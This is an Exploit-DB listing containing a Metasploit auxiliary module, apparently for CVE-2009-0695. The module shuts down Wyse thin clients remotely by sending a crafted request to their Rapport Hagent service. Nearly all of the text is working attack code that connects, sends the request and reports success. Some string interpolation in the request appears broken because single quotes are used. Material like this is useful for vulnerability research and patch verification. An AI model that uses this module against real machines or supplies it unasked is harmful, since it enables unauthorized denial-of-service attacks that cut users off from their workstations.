Wyse - Machine Remote Power Off (Denial of Service) (Metasploit)

EDB-ID:

19137


Type:

dos


Platform:

Hardware

Date:

2012-06-14


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Dos

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Wyse Machine Remote Power off (DOS)',
			'Description'    => %q{
					This module exploits the Wyse Rapport Hagent service and cause
                                        remote power cycle (Power off the wyse machine remotely).
			},
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'Author'         => 'it.solunium@gmail.com',
			'Version'        => '$Revision: 14976 $',
			'References'     =>
				[
					['CVE', '2009-0695'],
					['OSVDB', '55839'],
					['US-CERT-VU', '654545'],
					['URL', 'http://snosoft.blogspot.com/'],
					['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
					['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
					['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Targets'        =>
				[
					[ 'Wyse Linux x86', {'Platform' => 'linux',}],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 13 2012'
		))

		register_options(
			[
				Opt::RPORT(80),
			], self.class)
	end


	def run

		
		# Connect to the target service
		print_status("Connecting to the target #{rhost}:#{rport}")
		if connect
                print_status("Connected...")
                end

		# Parameters

                genmac     = "00"+Rex::Text.rand_text(5).unpack("H*")[0]

		craft_req = '&V52&CI=3|'
                craft_req << 'MAC=#{genmac}|#{rhost}|'
                craft_req << 'RB=0|MT=3|'
                craft_req << '|HS=#{rhost}|PO=#{rport}|'
                craft_req << 'SPO=0|' 

                # Send the malicious request
		sock.put(craft_req)

		# Download some response data
		resp = sock.get_once(-1, 10)
		print_status("Received: #{resp}")

                disconnect

		if not resp
			print_error("No reply from the target, this may not be a vulnerable system")
			return
		end

		if resp == '&00'
                print_status("#{rhost} execute command succefuly & power off.")
                return
                end

                #Exeptions
		rescue ::Rex::ConnectionRefused 
			print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
                rescue ::Rex::HostUnreachable
			print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
                rescue  ::Rex::ConnectionTimeout
			print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
		rescue ::Errno::ECONNRESET, ::Timeout::Error
			print_status("#{rhost} not responding.")

	end
end